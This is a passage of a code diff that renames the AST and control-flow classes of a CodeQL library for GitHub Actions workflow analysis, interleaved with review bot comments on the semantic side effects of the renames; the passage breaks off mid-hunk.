@@ -80,27 +71,25 @@ class WorkflowStmt extends Statement instanceof Actions::Workflow { exists(YamlNode n | n = super.getOn().(YamlMappingLikeNode).getNode(result)) } - Statement getPermissionsStmt() { result = this.(YamlMapping).lookup("permissions") } + Permissions getPermissions() { result = this.(YamlMapping).lookup("permissions") } - StrategyStmt getStrategyStmt() { result = this.(YamlMapping).lookup("strategy") } + Strategy getStrategy() { result = this.(YamlMapping).lookup("strategy") } } -class ReusableWorkflowStmt extends WorkflowStmt { +class ReusableWorkflow extends Workflow { YamlValue workflow_call; - ReusableWorkflowStmt() { - this.(Actions::Workflow).getOn().getNode("workflow_call") = workflow_call - } + ReusableWorkflow() { this.(Actions::Workflow).getOn().getNode("workflow_call") = workflow_call } - InputsStmt getInputsStmt() { result = workflow_call.(YamlMapping).lookup("inputs") } + Inputs getInputs() { result = workflow_call.(YamlMapping).lookup("inputs") } - OutputsStmt getOutputsStmt() { result = workflow_call.(YamlMapping).lookup("outputs") } + Outputs getOutputs() { result = workflow_call.(YamlMapping).lookup("outputs") } } -class InputsStmt extends Statement instanceof YamlMapping { +class Inputs extends AstNode instanceof YamlMapping { YamlMapping parent; - InputsStmt() { parent.lookup("inputs") = this } + Inputs() { parent.lookup("inputs") = this } /** * Gets a specific input expression (YamlMapping) by name. @@ -111,10 +100,10 @@ class InputsStmt extends Statement instanceof YamlMapping { } } -class OutputsStmt extends Statement instanceof YamlMapping { +class Outputs extends AstNode instanceof YamlMapping { YamlMapping parent; - OutputsStmt() { parent.lookup("outputs") = this } + Outputs() { parent.lookup("outputs") = this } /** * Gets a specific output expression (YamlMapping) by name. 
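Review bot: `Permissions getPermissions()` in the `@@ -80,27 +71,25 @@` hunk only has a result when `permissions` is a YAML mapping, because the new `Permissions` class (defined in the following `@@ -127,10 +116,16 @@` hunk) is declared `instanceof YamlMapping`; the replaced `Statement getPermissionsStmt()` also matched the scalar forms `permissions: read-all` and `permissions: write-all`, which GitHub Actions accepts. If the permissions query listed in the diffstat relies on this getter, a workflow or job using the scalar form would appear to declare no permissions at all, which is the opposite of what that check should report. The same narrowing applies to `Job.getPermissions()` in the `@@ -209,42 +183,42 @@` hunk. Either document the restriction on `Permissions` (the new class also has no QLDoc comment) or drop it, e.g. `class Permissions extends AstNode { YamlMapping parent; Permissions() { parent.lookup("permissions") = this } }`.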
@@ -127,10 +116,16 @@ class OutputsStmt extends Statement instanceof YamlMapping { string getAnOutputName() { this.(YamlMapping).maps(any(YamlString s | s.getValue() = result), _) } } -class StrategyStmt extends Statement instanceof YamlMapping { +class Permissions extends AstNode instanceof YamlMapping { YamlMapping parent; - StrategyStmt() { parent.lookup("strategy") = this } + Permissions() { parent.lookup("permissions") = this } +} + +class Strategy extends AstNode instanceof YamlMapping { + YamlMapping parent; + + Strategy() { parent.lookup("strategy") = this } /** * Gets a specific matric expression (YamlMapping) by name. @@ -144,31 +139,10 @@ class StrategyStmt extends Statement instanceof YamlMapping { } } -class InputExpr extends Expression instanceof YamlString { - InputExpr() { exists(InputsStmt inputs | inputs.(YamlMapping).maps(this, _)) } -} - -class OutputExpr extends Expression instanceof YamlString { - OutputExpr() { - exists(OutputsStmt outputs | - outputs.(YamlMapping).lookup(_).(YamlMapping).lookup("value") = this or - outputs.(YamlMapping).lookup(_) = this - ) - } -} - -class MatrixVariableExpr extends Expression instanceof YamlString { - MatrixVariableExpr() { - exists(StrategyStmt outputs | - outputs.(YamlMapping).lookup("matrix").(YamlMapping).lookup(_) = this - ) - } -} - /** * A Job is a collection of steps that run in an execution environment. */ -class JobStmt extends Statement instanceof Actions::Job { +class Job extends AstNode instanceof Actions::Job { /** * Gets the ID of this job, as a string. * This is the job's key within the `jobs` mapping. 
@@ -176,20 +150,20 @@ class JobStmt extends Statement instanceof Actions::Job { string getId() { result = super.getId() } /** Gets the step at the given index within this job. */ - StepStmt getStepStmt(int index) { result = super.getStep(index) } + Step getStep(int index) { result = super.getStep(index) } /** Gets any steps that are defined within this job. */ - StepStmt getAStepStmt() { result = super.getStep(_) } + Step getAStep() { result = super.getStep(_) } /** * Gets a needed job. * eg: * - needs: [job1, job2] */ - JobStmt getNeededJob() { + Job getNeededJob() { exists(Actions::Needs needs | needs.getJob() = this and - result = needs.getANeededJob().(JobStmt) + result = needs.getANeededJob() ) } @@ -199,7 +173,7 @@ class JobStmt extends Statement instanceof Actions::Job { * out1: ${steps.foo.bar} * out2: ${steps.foo.baz} */ - OutputsStmt getOutputsStmt() { result = this.(Actions::Job).lookup("outputs") } + Outputs getOutputs() { result = this.(Actions::Job).lookup("outputs") } /** * Reusable workflow jobs may have Uses children 
@@ -209,42 +183,42 @@ class JobStmt extends Statement instanceof Actions::Job { * with: * arg1: value1 */ - JobUsesExpr getUsesExpr() { result.getJobStmt() = this } + JobUses getUses() { result.getJob() = this } predicate usesReusableWorkflow() { this.(YamlMapping).maps(any(YamlString s | s.getValue() = "uses"), _) } - IfStmt getIfStmt() { result = super.getIf() } + If getIf() { result = super.getIf() } - Statement getPermissionsStmt() { result = this.(YamlMapping).lookup("permissions") } + Permissions getPermissions() { result = this.(YamlMapping).lookup("permissions") } - StrategyStmt getStrategyStmt() { result = this.(YamlMapping).lookup("strategy") } + Strategy getStrategy() { result = this.(YamlMapping).lookup("strategy") } } /** * A Step is a single task that can be executed as part of a job. */ -class StepStmt extends Statement instanceof Actions::Step { +class Step extends AstNode instanceof Actions::Step { string getId() { result = super.getId() } - JobStmt getJobStmt() { result = super.getJob() } + Job getJob() { result = super.getJob() } - IfStmt getIfStmt() { result = super.getIf() } + If getIf() { result = super.getIf() } } /** * An If node representing a conditional statement. */ -class IfStmt extends Statement { +class If extends AstNode { YamlMapping parent; - IfStmt() { + If() { (parent instanceof Actions::Step or parent instanceof Actions::Job) and parent.lookup("if") = this } - Statement getEnclosingStatement() { result = parent } + AstNode getEnclosingNode() { result = parent } string getCondition() { result = this.(YamlScalar).getValue() } } @@ -252,7 +226,7 @@ class IfStmt extends Statement { /** * Abstract class representing a call to a 3rd party action or reusable workflow. */ -abstract class UsesExpr extends Expression { +abstract class Uses extends AstNode { abstract string getCallee(); abstract string getVersion(); 
@@ -263,10 +237,10 @@ abstract class UsesExpr extends Expression { /** * A Uses step represents a call to an action that is defined in a GitHub repository. */ -class StepUsesExpr extends StepStmt, UsesExpr { +class StepUses extends Step, Uses { Actions::Uses uses; - StepUsesExpr() { uses.getStep() = this } + StepUses() { uses.getStep() = this } override string getCallee() { result = uses.getGitHubRepository() } @@ -288,12 +262,10 @@ class StepUsesExpr extends StepStmt, UsesExpr { /** * A Uses step represents a call to an action that is defined in a GitHub repository. */ -class JobUsesExpr extends UsesExpr instanceof YamlMapping { - JobUsesExpr() { - this instanceof JobStmt and this.maps(any(YamlString s | s.getValue() = "uses"), _) - } +class JobUses extends Uses instanceof YamlMapping { + JobUses() { this instanceof Job and this.maps(any(YamlString s | s.getValue() = "uses"), _) } - JobStmt getJobStmt() { result = this } + Job getJob() { result = this } /** * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. 
@@ -336,35 +308,70 @@ class JobUsesExpr extends UsesExpr instanceof YamlMapping { /** * A Run step represents the evaluation of a provided script */ -class RunExpr extends StepStmt, Expression { +class Run extends Step { Actions::Run scriptExpr; - RunExpr() { scriptExpr.getStep() = this } + Run() { scriptExpr.getStep() = this } Expression getScriptExpr() { result = scriptExpr } string getScript() { result = scriptExpr.getValue() } } +/** + * An AST node associated with a Reusable Workflow input. + */ +class InputExpr extends AstNode { + InputExpr() { exists(Inputs inputs | inputs.(YamlMapping).maps(this, _)) } +} + +/** + * An AST node holding an Env var value. + */ +class EnvExpr extends AstNode { + EnvExpr() { exists(Actions::Env env | env.(YamlMapping).lookup(_) = this) } +} + +/** + * An AST node holding a job or workflow output var. + */ +class OutputExpr extends AstNode { + OutputExpr() { + exists(Outputs outputs | + outputs.(YamlMapping).lookup(_).(YamlMapping).lookup("value") = this or + outputs.(YamlMapping).lookup(_) = this + ) + } +} + +/** + * An AST node holding a matrix var. + */ +class MatrixVariableExpr extends AstNode { + MatrixVariableExpr() { + exists(Strategy outputs | outputs.(YamlMapping).lookup("matrix").(YamlMapping).lookup(_) = this) + } +} + /** * Evaluation of a workflow expression ${{}}. */ -class ExprAccessExpr extends Expression instanceof YamlString { +class Expression extends AstNode instanceof YamlString { string expr; - ExprAccessExpr() { expr = Actions::getASimpleReferenceExpression(this) } + Expression() { expr = Actions::getASimpleReferenceExpression(this) } string getExpression() { result = expr } - JobStmt getJobStmt() { result.getAChildNode*() = this } + Job getJob() { result.getAChildNode*() = this } } /** - * A context access expression. + * A ${{}} expression accessing a context variable. 
* https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability */ -class CtxAccessExpr extends ExprAccessExpr { - CtxAccessExpr() { +class ContextExpression extends Expression { + ContextExpression() { expr.regexpMatch([ stepsCtxRegex(), needsCtxRegex(), jobsCtxRegex(), envCtxRegex(), inputsCtxRegex(), matrixCtxRegex() @@ -373,7 +380,7 @@ class CtxAccessExpr extends ExprAccessExpr { abstract string getFieldName(); - abstract Expression getRefExpr(); + abstract AstNode getTarget(); } private string stepsCtxRegex() { @@ -406,11 +413,11 @@ private string wrapRegexp(string regex) { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ steps.changed-files.outputs.all_changed_files }}` */ -class StepsCtxAccessExpr extends CtxAccessExpr { +class StepsExpression extends ContextExpression { string stepId; string fieldName; - StepsCtxAccessExpr() { + StepsExpression() { expr.regexpMatch(stepsCtxRegex()) and stepId = expr.regexpCapture(stepsCtxRegex(), 1) and fieldName = expr.regexpCapture(stepsCtxRegex(), 2) @@ -418,9 +425,9 @@ class StepsCtxAccessExpr extends CtxAccessExpr { override string getFieldName() { result = fieldName } - override Expression getRefExpr() { + override AstNode getTarget() { this.getLocation().getFile() = result.getLocation().getFile() and - result.(StepStmt).getId() = stepId + result.(Step).getId() = stepId } } @@ -429,12 +436,12 @@ class StepsCtxAccessExpr extends CtxAccessExpr { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ needs.job1.outputs.foo}}` */ -class NeedsCtxAccessExpr extends CtxAccessExpr { - JobStmt job; +class NeedsExpression extends ContextExpression { + Job job; string jobId; string fieldName; - NeedsCtxAccessExpr() { + NeedsExpression() { expr.regexpMatch(needsCtxRegex()) and jobId = expr.regexpCapture(needsCtxRegex(), 1) and fieldName = expr.regexpCapture(needsCtxRegex(), 2) and 
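Review bot: In the `@@ -336,35 +308,70 @@` hunk, `Expression` is redefined as a `YamlString` for which `Actions::getASimpleReferenceExpression` holds, but the unchanged context line `Expression getScriptExpr() { result = scriptExpr }` in `Run` keeps that name as its return type, so a `run:` script that contains no `${{ }}` reference no longer has a script expression. Since `RunTree.getChildNode` in Cfg.qll (the `@@ -279,11 +271,10 @@` hunk) collects children via `super.getScriptExpr()`, such scripts appear to drop out of the control-flow tree; I have not traced whether anything else depends on this predicate. If the intent is to keep every script, change the return type to `AstNode getScriptExpr() { result = scriptExpr }` (or whichever AST supertype `Actions::Run` satisfies).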
@@ -445,14 +452,14 @@ class NeedsCtxAccessExpr extends CtxAccessExpr { override string getFieldName() { result = fieldName } - override Expression getRefExpr() { + override AstNode getTarget() { job.getLocation().getFile() = this.getLocation().getFile() and ( // regular jobs - job.getOutputsStmt() = result + job.getOutputs() = result or // reusable workflow calling jobs - job.getUsesExpr() = result + job.getUses() = result ) } } @@ -462,11 +469,11 @@ class NeedsCtxAccessExpr extends CtxAccessExpr { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ jobs.job1.outputs.foo}}` (within reusable workflows) */ -class JobsCtxAccessExpr extends CtxAccessExpr { +class JobsExpression extends ContextExpression { string jobId; string fieldName; - JobsCtxAccessExpr() { + JobsExpression() { expr.regexpMatch(jobsCtxRegex()) and jobId = expr.regexpCapture(jobsCtxRegex(), 1) and fieldName = expr.regexpCapture(jobsCtxRegex(), 2) @@ -474,11 +481,11 @@ class JobsCtxAccessExpr extends CtxAccessExpr { override string getFieldName() { result = fieldName } - override Expression getRefExpr() { - exists(JobStmt job | + override AstNode getTarget() { + exists(Job job | job.getId() = jobId and job.getLocation().getFile() = this.getLocation().getFile() and - job.getOutputsStmt() = result + job.getOutputs() = result ) } } 
@@ -488,21 +495,23 @@ class JobsCtxAccessExpr extends CtxAccessExpr { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ inputs.foo }}` */ -class InputsCtxAccessExpr extends CtxAccessExpr { +class InputsExpression extends ContextExpression { string fieldName; - InputsCtxAccessExpr() { + InputsExpression() { expr.regexpMatch(inputsCtxRegex()) and fieldName = expr.regexpCapture(inputsCtxRegex(), 1) } override string getFieldName() { result = fieldName } - override Expression getRefExpr() { + override AstNode getTarget() { result.getLocation().getFile() = this.getLocation().getFile() and - exists(ReusableWorkflowStmt w | w.getInputsStmt().getInputExpr(fieldName) = result) - or - exists(CompositeActionStmt a | a.getInputsStmt().getInputExpr(fieldName) = result) + ( + exists(ReusableWorkflow w | w.getInputs().getInputExpr(fieldName) = result) + or + exists(CompositeAction a | a.getInputs().getInputExpr(fieldName) = result) + ) } } @@ -511,18 +520,18 @@ class InputsCtxAccessExpr extends CtxAccessExpr { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ env.foo }}` */ -class EnvCtxAccessExpr extends CtxAccessExpr { +class EnvExpression extends ContextExpression { string fieldName; - EnvCtxAccessExpr() { + EnvExpression() { expr.regexpMatch(envCtxRegex()) and fieldName = expr.regexpCapture(envCtxRegex(), 1) } override string getFieldName() { result = fieldName } - override Expression getRefExpr() { - exists(Statement s | + override AstNode getTarget() { + exists(AstNode s | s.getEnvExpr(fieldName) = result and s.getAChildNode*() = this ) 
@@ -534,24 +543,24 @@ class EnvCtxAccessExpr extends CtxAccessExpr { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ matrix.foo }}` */ -class MatrixCtxAccessExpr extends CtxAccessExpr { +class MatrixExpression extends ContextExpression { string fieldName; - MatrixCtxAccessExpr() { + MatrixExpression() { expr.regexpMatch(matrixCtxRegex()) and fieldName = expr.regexpCapture(matrixCtxRegex(), 1) } override string getFieldName() { result = fieldName } - override Expression getRefExpr() { - exists(WorkflowStmt w | - w.getStrategyStmt().getMatrixVariableExpr(fieldName) = result and + override AstNode getTarget() { + exists(Workflow w | + w.getStrategy().getMatrixVariableExpr(fieldName) = result and w.getAChildNode*() = this ) or - exists(JobStmt j | - j.getStrategyStmt().getMatrixVariableExpr(fieldName) = result and + exists(Job j | + j.getStrategy().getMatrixVariableExpr(fieldName) = result and j.getAChildNode*() = this ) } diff --git a/ql/lib/codeql/actions/controlflow/BasicBlocks.qll b/ql/lib/codeql/actions/controlflow/BasicBlocks.qll index cdc7b0cf24f1..af5e0f62552f 100644 --- a/ql/lib/codeql/actions/controlflow/BasicBlocks.qll +++ b/ql/lib/codeql/actions/controlflow/BasicBlocks.qll @@ -442,4 +442,3 @@ class ConditionBlock extends BasicBlock { */ predicate controls(BasicBlock controlled, BooleanSuccessor s) { controls(this, controlled, s) } } - diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index b8137172b8c9..2bc867234931 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll 
@@ -83,9 +83,9 @@ module Completion { module CfgScope { abstract class CfgScope extends AstNode { } - class WorkflowScope extends CfgScope instanceof WorkflowStmt { } + class WorkflowScope extends CfgScope instanceof Workflow { } - class CompositeActionScope extends CfgScope instanceof CompositeActionStmt { } + class CompositeActionScope extends CfgScope instanceof CompositeAction { } } private module Implementation implements CfgShared::InputSig { @@ -119,13 +119,13 @@ private module Implementation implements CfgShared::InputSig { int maxSplits() { result = 0 } predicate scopeFirst(CfgScope scope, AstNode e) { - first(scope.(WorkflowStmt), e) or - first(scope.(CompositeActionStmt), e) + first(scope.(Workflow), e) or + first(scope.(CompositeAction), e) } predicate scopeLast(CfgScope scope, AstNode e, Completion c) { - last(scope.(WorkflowStmt), e, c) or - last(scope.(CompositeActionStmt), e, c) + last(scope.(Workflow), e, c) or + last(scope.(CompositeAction), e, c) } predicate successorTypeIsSimple(SuccessorType t) { t instanceof NormalSuccessor } @@ -143,14 +143,14 @@ private import CfgImpl private import Completion private import CfgScope -private class CompositeActionTree extends StandardPreOrderTree instanceof CompositeActionStmt { +private class CompositeActionTree extends StandardPreOrderTree instanceof CompositeAction { override ControlFlowTree getChildNode(int i) { result = - rank[i](Expression child, Location l | + rank[i](AstNode child, Location l | ( - child = this.(CompositeActionStmt).getInputsStmt() or - child = this.(CompositeActionStmt).getOutputsStmt() or - child = this.(CompositeActionStmt).getRunsStmt() + child = this.(CompositeAction).getInputs() or + child = this.(CompositeAction).getOutputs() or + child = this.(CompositeAction).getRuns() ) and l = child.getLocation() | 
@@ -161,21 +161,21 @@ private class CompositeActionTree extends StandardPreOrderTree instanceof Compos } } -private class RunsTree extends StandardPreOrderTree instanceof RunsStmt { - override ControlFlowTree getChildNode(int i) { result = super.getStepStmt(i) } +private class RunsTree extends StandardPreOrderTree instanceof Runs { + override ControlFlowTree getChildNode(int i) { result = super.getStep(i) } } -private class WorkflowTree extends StandardPreOrderTree instanceof WorkflowStmt { +private class WorkflowTree extends StandardPreOrderTree instanceof Workflow { override ControlFlowTree getChildNode(int i) { - if this instanceof ReusableWorkflowStmt + if this instanceof ReusableWorkflow then result = - rank[i](Expression child, Location l | + rank[i](AstNode child, Location l | ( - child = this.(ReusableWorkflowStmt).getInputsStmt() or - child = this.(ReusableWorkflowStmt).getOutputsStmt() or - child = this.(ReusableWorkflowStmt).getStrategyStmt() or - child = this.(ReusableWorkflowStmt).getAJobStmt() + child = this.(ReusableWorkflow).getInputs() or + child = this.(ReusableWorkflow).getOutputs() or + child = this.(ReusableWorkflow).getStrategy() or + child = this.(ReusableWorkflow).getAJob() ) and l = child.getLocation() | @@ -185,10 +185,10 @@ private class WorkflowTree extends StandardPreOrderTree instanceof WorkflowStmt ) else result = - rank[i](Expression child, Location l | + rank[i](AstNode child, Location l | ( - child = super.getAJobStmt() or - child = super.getStrategyStmt() + child = super.getAJob() or + child = super.getStrategy() ) and l = child.getLocation() | 
@@ -199,10 +199,10 @@ private class WorkflowTree extends StandardPreOrderTree instanceof WorkflowStmt } } -private class InputsTree extends StandardPreOrderTree instanceof InputsStmt { +private class InputsTree extends StandardPreOrderTree instanceof Inputs { override ControlFlowTree getChildNode(int i) { result = - rank[i](Expression child, Location l | + rank[i](AstNode child, Location l | child = super.getInputExpr(_) and l = child.getLocation() | child @@ -212,12 +212,10 @@ private class InputsTree extends StandardPreOrderTree instanceof InputsStmt { } } -private class InputExprTree extends LeafTree instanceof InputExpr { } - -private class OutputsTree extends StandardPreOrderTree instanceof OutputsStmt { +private class OutputsTree extends StandardPreOrderTree instanceof Outputs { override ControlFlowTree getChildNode(int i) { result = - rank[i](Expression child, Location l | + rank[i](AstNode child, Location l | child = super.getOutputExpr(_) and l = child.getLocation() | child @@ -227,12 +225,10 @@ private class OutputsTree extends StandardPreOrderTree instanceof OutputsStmt { } } -private class OutputExprTree extends LeafTree instanceof OutputExpr { } - -private class StrategyTree extends StandardPreOrderTree instanceof StrategyStmt { +private class StrategyTree extends StandardPreOrderTree instanceof Strategy { override ControlFlowTree getChildNode(int i) { result = - rank[i](Expression child, Location l | + rank[i](AstNode child, Location l | child = super.getMatrixVariableExpr(_) and l = child.getLocation() | child 
@@ -242,17 +238,15 @@ private class StrategyTree extends StandardPreOrderTree instanceof StrategyStmt } } -private class MatrixVariableExprTree extends LeafTree instanceof MatrixVariableExpr { } - -private class JobTree extends StandardPreOrderTree instanceof JobStmt { +private class JobTree extends StandardPreOrderTree instanceof Job { override ControlFlowTree getChildNode(int i) { result = - rank[i](Expression child, Location l | + rank[i](AstNode child, Location l | ( - child = super.getAStepStmt() or - child = super.getOutputsStmt() or - child = super.getStrategyStmt() or - child = super.getUsesExpr() + child = super.getAStep() or + child = super.getOutputs() or + child = super.getStrategy() or + child = super.getUses() ) and l = child.getLocation() | @@ -263,12 +257,10 @@ private class JobTree extends StandardPreOrderTree instanceof JobStmt { } } -private class UsesExprTree extends LeafTree instanceof UsesExpr { } - -private class UsesTree extends StandardPreOrderTree instanceof UsesExpr { +private class UsesTree extends StandardPreOrderTree instanceof Uses { override ControlFlowTree getChildNode(int i) { result = - rank[i](Expression child, Location l | + rank[i](AstNode child, Location l | (child = super.getArgumentExpr(_) or child = super.getEnvExpr(_)) and l = child.getLocation() | @@ -279,11 +271,10 @@ private class UsesTree extends StandardPreOrderTree instanceof UsesExpr { } } -private class RunTree extends StandardPreOrderTree instanceof RunExpr { - //override ControlFlowTree getChildNode(int i) { result = super.getScriptExpr() and i = 0 } +private class RunTree extends StandardPreOrderTree instanceof Run { override ControlFlowTree getChildNode(int i) { result = - rank[i](Expression child, Location l | + rank[i](AstNode child, Location l | (child = super.getEnvExpr(_) or child = super.getScriptExpr()) and l = child.getLocation() | 
@@ -294,4 +285,16 @@ private class RunTree extends StandardPreOrderTree instanceof RunExpr { } } -private class ExprAccessTree extends LeafTree instanceof ExprAccessExpr { } +private class UsesLeaf extends LeafTree instanceof Uses { } + +private class InputExprTree extends LeafTree instanceof InputExpr { } + +private class OutputExprTree extends LeafTree instanceof OutputExpr { } + +private class MatrixVariableExprTree extends LeafTree instanceof MatrixVariableExpr { } + +private class EnvExprTree extends LeafTree instanceof EnvExpr { } + +private class ExprAccessTree extends LeafTree instanceof ContextExpression { } + +private class AstNodeLeaf extends LeafTree instanceof Expression { } diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 594b6017729e..479078fe18b2 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -42,7 +42,7 @@ predicate sinkModel(string action, string version, string input, string kind) { predicate externallyDefinedSource( DataFlow::Node source, string sourceType, string fieldName, string trigger ) { - exists(UsesExpr uses, string action, string version, string kind | + exists(Uses uses, string action, string version, string kind | sourceModel(action, version, fieldName, trigger, kind) and uses.getCallee() = action.toLowerCase() and ( @@ -65,7 +65,7 @@ predicate externallyDefinedSource( predicate externallyDefinedStoreStep( DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c ) { - exists(UsesExpr uses, string action, string version, string input, string output | + exists(Uses uses, string action, string version, string input, string output | summaryModel(action, version, input, output, "taint") and c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output.", "")) and uses.getCallee() = action.toLowerCase() and 
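Review bot: The leaf-tree names in the `@@ -294,4 +285,16 @@` hunk no longer match the classes they wrap after the rename: `ExprAccessTree` is declared over `ContextExpression` and `AstNodeLeaf` over `Expression`. Since this commit is a rename pass, `ContextExpressionTree` and `ExpressionTree` would keep the file consistent with the other `*Tree` classes added in the same hunk. Note also that `ContextExpression extends Expression`, so both leaf classes apply to the same nodes; that is harmless for two `LeafTree` subclasses, but a one-line comment saying so would save the next reader a check.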
@@ -87,7 +87,7 @@ predicate externallyDefinedStoreStep( } predicate externallyDefinedSink(DataFlow::ExprNode sink, string kind) { - exists(UsesExpr uses, string action, string version, string input | + exists(Uses uses, string action, string version, string input | ( if input.trim().matches("env.%") then sink.asExpr() = uses.getEnvExpr(input.trim().replaceAll("env.", "")) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 0e82498bfc15..c30c963afdb0 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -114,7 +114,7 @@ private class EventSource extends RemoteFlowSource { string trigger; EventSource() { - exists(ExprAccessExpr e, string context | this.asExpr() = e and context = e.getExpression() | + exists(Expression e, string context | this.asExpr() = e and context = e.getExpression() | trigger = ["issues", "issue_comment"] and isExternalUserControlledIssue(context) or trigger = ["pull_request_target", "pull_request_review", "pull_request_review_comment"] and @@ -158,9 +158,9 @@ private class ExternallyDefinedSource extends RemoteFlowSource { * An input for a Composite Action */ private class CompositeActionInputSource extends RemoteFlowSource { - CompositeActionStmt c; + CompositeAction c; - CompositeActionInputSource() { c.getInputsStmt().getInputExpr(_) = this.asExpr() } + CompositeActionInputSource() { c.getInputs().getInputExpr(_) = this.asExpr() } override string getSourceType() { result = "Composite action input" } diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index bc0c782e9ff0..64df342ae9b7 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll 
@@ -34,7 +34,7 @@ class AdditionalTaintStep extends Unit { * echo "foo=$(echo $BODY)" >> "$GITHUB_OUTPUT" */ predicate runEnvToScriptStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(RunExpr r, string varName, string output | + exists(Run r, string varName, string output | c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output\\.", "")) and r.getEnvExpr(varName) = pred.asExpr() and exists(string script, string line | diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index b9aafb8ec948..62975959b399 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -54,21 +54,22 @@ DataFlowType getNodeType(Node node) { any() } predicate nodeIsHidden(Node node) { none() } class DataFlowExpr extends Cfg::Node { - DataFlowExpr() { this.getAstNode() instanceof Expression } + DataFlowExpr() { any() } + //DataFlowExpr() { this.getAstNode() instanceof Expression } } /** * A call corresponds to a Uses steps where a 3rd party action or a reusable workflow get called */ class DataFlowCall instanceof Cfg::Node { - DataFlowCall() { super.getAstNode() instanceof UsesExpr } + DataFlowCall() { super.getAstNode() instanceof Uses } /** Gets a textual representation of this element. */ string toString() { result = super.toString() } Location getLocation() { result = super.getLocation() } - string getName() { result = super.getAstNode().(UsesExpr).getCallee() } + string getName() { result = super.getAstNode().(Uses).getCallee() } DataFlowCallable getEnclosingCallable() { result = super.getScope() } } 
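Review bot: `DataFlowExpr() { any() }` in the `@@ -54,21 +54,22 @@` hunk of DataFlowPrivate.qll makes every `Cfg::Node` a data-flow expression, and the old characteristic predicate is left behind as the commented-out line `//DataFlowExpr() { this.getAstNode() instanceof Expression }`. Commented-out code does not record intent; either remove the line or replace it with a comment stating why the restriction was dropped, e.g. `// Every CFG node is a data-flow expression now that Expression only covers ${{ }} references.`. Whether widening this class changes the results of the library tests in the diffstat is not visible from this hunk.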
@@ -82,11 +83,11 @@ class DataFlowCallable instanceof Cfg::CfgScope { Location getLocation() { result = super.getLocation() } string getName() { - if this instanceof ReusableWorkflowStmt - then result = this.(ReusableWorkflowStmt).getLocation().getFile().getRelativePath() + if this instanceof ReusableWorkflow + then result = this.(ReusableWorkflow).getLocation().getFile().getRelativePath() else - if this instanceof CompositeActionStmt - then result = this.(CompositeActionStmt).getLocation().getFile().getRelativePath() + if this instanceof CompositeAction + then result = this.(CompositeAction).getLocation().getFile().getRelativePath() else none() } } @@ -134,9 +135,9 @@ predicate typeStrongerThan(DataFlowType t1, DataFlowType t2) { none() } newtype TContent = TFieldContent(string name) { // We only use field flow for steps and jobs outputs, not for accessing other context fields such as env, matrix or inputs - name = any(StepsCtxAccessExpr a).getFieldName() or - name = any(NeedsCtxAccessExpr a).getFieldName() or - name = any(JobsCtxAccessExpr a).getFieldName() + name = any(StepsExpression a).getFieldName() or + name = any(NeedsExpression a).getFieldName() or + name = any(JobsExpression a).getFieldName() } predicate forceHighPrecision(Content c) { c instanceof FieldContent } @@ -149,14 +150,14 @@ ContentApprox getContentApprox(Content c) { result = c } * Made a string to match the ArgumentPosition type. */ class ParameterPosition extends string { - ParameterPosition() { exists(any(ReusableWorkflowStmt w).getInputsStmt().getInputExpr(this)) } + ParameterPosition() { exists(any(ReusableWorkflow w).getInputs().getInputExpr(this)) } } /** * Made a string to match `With:` keys in the AST */ class ArgumentPosition extends string { - ArgumentPosition() { exists(any(UsesExpr e).getArgumentExpr(this)) } + ArgumentPosition() { exists(any(Uses e).getArgumentExpr(this)) } } /** 
@@ -172,11 +173,11 @@ predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = * field name. */ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(UsesExpr astFrom, StepsCtxAccessExpr astTo | + exists(Uses astFrom, StepsExpression astTo | externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName(), _) and astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and - astTo.getRefExpr() = astFrom + astTo.getTarget() = astFrom ) } @@ -189,11 +190,11 @@ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { * field name. */ predicate needsCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(UsesExpr astFrom, NeedsCtxAccessExpr astTo | + exists(Uses astFrom, NeedsExpression astTo | externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName(), _) and astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and - astTo.getRefExpr() = astFrom + astTo.getTarget() = astFrom ) } @@ -202,10 +203,10 @@ predicate needsCtxLocalStep(Node nodeFrom, Node nodeTo) { * e.g. ${{ inputs.foo }} */ predicate inputsCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(Expression astFrom, 